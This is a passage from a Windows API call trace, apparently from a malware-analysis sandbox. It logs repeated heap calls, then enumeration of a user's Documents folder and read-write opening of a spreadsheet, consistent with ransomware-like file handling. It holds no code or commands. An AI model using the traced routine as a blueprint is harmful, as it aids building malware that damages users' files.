returned 1 [0193.107] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.107] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0193.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0193.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0193.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0193.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0193.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0193.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0193.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0193.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0193.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0193.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0193.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0193.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0193.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0193.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0193.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0193.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.118] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0193.118] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0193.119] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.119] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0193.120] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.120] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.120] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.120] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0193.120] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.121] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0193.121] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.121] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0193.122] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.122] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0193.122] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0193.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0193.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.124] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0193.124] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.124] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0193.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0193.125] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.125] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0193.125] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0193.126] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.126] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.126] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.126] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0193.127] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.127] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0193.127] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.128] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0193.128] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.128] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0193.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0193.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0193.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0193.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0193.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.131] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.131] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.131] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0193.131] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.131] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.131] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.131] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0193.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.132] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.132] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0193.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.132] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0193.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0193.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0193.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0193.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0193.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0193.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0193.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0193.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0193.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.138] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.138] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0193.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.139] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.139] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.139] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0193.139] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.140] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0193.140] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0193.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0193.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0193.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0193.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0193.144] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.144] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0193.144] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.145] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.145] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.145] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0193.145] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.145] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.145] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.145] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0193.145] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.146] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0193.146] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.146] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0193.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.147] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0193.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0193.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.148] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0193.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0193.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.148] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0193.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.149] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0193.149] PathFindFileNameW (pszPath="") returned="" [0193.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.149] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x98a34810, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x98a34810, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0193.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.150] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x98a34810, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x98a34810, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0193.150] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaacd110, ftCreationTime.dwHighDateTime=0x1d8547e, ftLastAccessTime.dwLowDateTime=0x277b5750, ftLastAccessTime.dwHighDateTime=0x1d86422, ftLastWriteTime.dwLowDateTime=0x277b5750, ftLastWriteTime.dwHighDateTime=0x1d86422, nFileSizeHigh=0x0, nFileSizeLow=0xfbbc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0Lepi.xlsx", cAlternateFileName="0LEPI~1.XLS")) returned 1 [0193.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e) returned 0x2cb4658 [0193.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.150] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\0Lepi.xlsx") returned=".xlsx" [0193.150] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\0Lepi.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\0lepi.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0193.152] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=64444) returned 1 [0193.152] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0193.155] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xfb96, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.155] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, 